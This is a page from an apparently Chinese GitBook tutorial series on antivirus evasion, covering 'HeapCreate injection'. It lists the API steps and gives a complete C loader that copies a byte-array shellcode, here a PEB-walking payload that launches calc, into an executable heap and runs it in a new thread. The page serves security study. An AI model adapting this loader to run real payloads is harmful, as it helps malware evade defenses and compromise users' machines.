onedaybook
  • 关于这个博客
  • C2工具原理分析
    • C2工具原理分析:从生成shellcode到上线CS服务器全过程
  • DevilC2工具开发
    • 关于这个项目
  • Rootkit工具开发
  • EvilLoader工具开发
  • 免杀
    • 问鼎免杀之路
      • 序言
      • 第一章-基础
        • 0-基础
        • 1-PE的相关数据结构
        • 2-WindowsAPI
        • 3-混淆加密
        • 4-特征修改
        • 5-分离
        • 6-转换
        • 7-保护
      • 第二章-执行与注入技术
        • 0-创建线程注入(CreateThread Injection)
        • 1-创建纤程注入(CreateFiber Injection)
        • 2-创建远程线程注入(CreateRemoteThread Injection)
        • 3-创建堆注入(HeapCreate Injection)
        • 4-创建线程池注入(CreateThreadpoolWait Injection)
        • 5-进程镂空注入(Process Hollowing Injection)
        • 6-DLL镂空注入(DLL Hollowing Injection)
        • 7-DLL劫持注入(涉及白加黑)
        • 8-映射注入(Mapping Injection)
        • 9-MapViewOfFile+NtMapViewOfSection
        • 10-挂钩注入(SetWindowsHookEx Injection)
        • 11-注册表注入
        • 12-设置上下文劫持注入(SetContext Hijack Injection)
        • 13-剪贴板注入(Clipboard Injection)
        • 14-突破session 0远程线程注入
        • 15-枚举RWX区域注入
        • 16-APC注入(APC Injection)
        • 17-APC & NtTestAlert Injection
        • 18-APC劫持
        • 19-Early Bird
        • 20-基于资源节加载shellcode
        • 21-内核回调表注入(KernelCallbackTable Injection)
        • 22-自举的代码幽灵——反射DLL注入(Reflective DLL Injection)
        • 23-内存申请总结
        • 24-移动或复制shellcode总结
        • 25-shellcode执行总结
      • 第三章-防御规避
        • 0-动态获取API函数(又称隐藏IAT)
        • 1-重写ring3 API函数
        • 2-自定义 String 哈希算法
      • 第四章-武器化
        • 0-Windows Shellcode开发
        • 1-Windows Shellcode开发(x86 stager)
        • 2-Windows Shellcode开发(x64 stager)
        • 3-Linux Shellcode开发(Stager & Reverse Shell)
        • 4-非PEB获取ntdll和kernel32模块基址的精妙之道
        • 5-从SRDI原理剖析再到PE2Shellcode的实现
      • 第五章-主动进攻
      • 第六章-社工钓鱼
    • 随笔
      • 0-用哥斯拉插件零基础免杀上线msf和cs
      • 1-新版RDI
      • 2-新新版RDI
  • 权限提升
  • 数字取证/应急响应
  • 工具二开
    • 哥斯拉二开
      • 环境准备
  • 代码审计
  • PWN
    • ret2text
    • ret2shellcode
    • ret2syscall
    • ret2libc1
    • ret2libc2
    • ret2libc3
Powered by GitBook
On this page
  • 一、前言
  • 二、流程
  • 三、代码实现
  1. 免杀
  2. 问鼎免杀之路
  3. 第二章-执行与注入技术

3-创建堆注入(HeapCreate Injection)

Previous2-创建远程线程注入(CreateRemoteThread Injection)Next4-创建线程池注入(CreateThreadpoolWait Injection)

Last updated 4 months ago

一、前言

创建堆注入 是一种在内存的堆区域申请一块内存区域,然后将shellcode移动到申请的堆区域,再执行shellcode的一种注入方式。如果学习过 转换 这一小节的读者想必非常熟悉 创建堆注入 ,因为那一小节的加载器的代码都是通过 创建堆注入 实现的。如果不熟悉也不用担心,因为这种注入方式很简单,我会在下文中再介绍一遍

值得注意的是,HeapCreate 的堆分配选项中有一个 HEAP_CREATE_ENABLE_EXECUTE,这意味着我们能够创建一个可执行的内存区域。

二、流程

  1. 使用 HeapCreate 创建一个堆对象。官方文档:

  2. 使用 HeapAlloc 为堆申请空间。官方文档:

  3. 使用 memcpy 将shellcode复制到指定内存区域。官方文档:

  4. 使用 CreateThread 创建一个线程执行指定位置的代码。官方文档:

  5. 使用 WaitForSingleObject 等待线程完成。官方文档:

三、代码实现

#include <windows.h>

int main()
{
	unsigned char buf[] = {
		0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A,
0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC,
0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48,
0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B,
0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B,
0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24,
0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C,
0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7,
0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E,
0x5B, 0x5A, 0x59, 0x58, 0xC3
	};

	// 创建一个堆对象
	HANDLE Hheap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);

	// 为堆申请空间
	LPVOID lpAddress = HeapAlloc(Hheap, 0, sizeof(buf));

	// 将shellcode复制到指定内存区域
	memcpy(lpAddress, buf, sizeof(buf));

	// 创建一个线程执行内存中的代码
	HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpAddress, NULL, 0, NULL);

	// 等待线程完成
	WaitForSingleObject(hThread, INFINITE);

	return 0;
}
HeapCreate 函数 (heapapi.h) - Win32 apps | Microsoft Learn
heapAlloc 函数 (heapapi.h) - Win32 apps | Microsoft Learn
cplusplus.com/reference/cstring/memcpy/?kw=memcpy
CreateThread 函数 (processthreadsapi.h) - Win32 apps | Microsoft Learn
WaitForSingleObject 函数 (synchapi.h) - Win32 apps | Microsoft Learn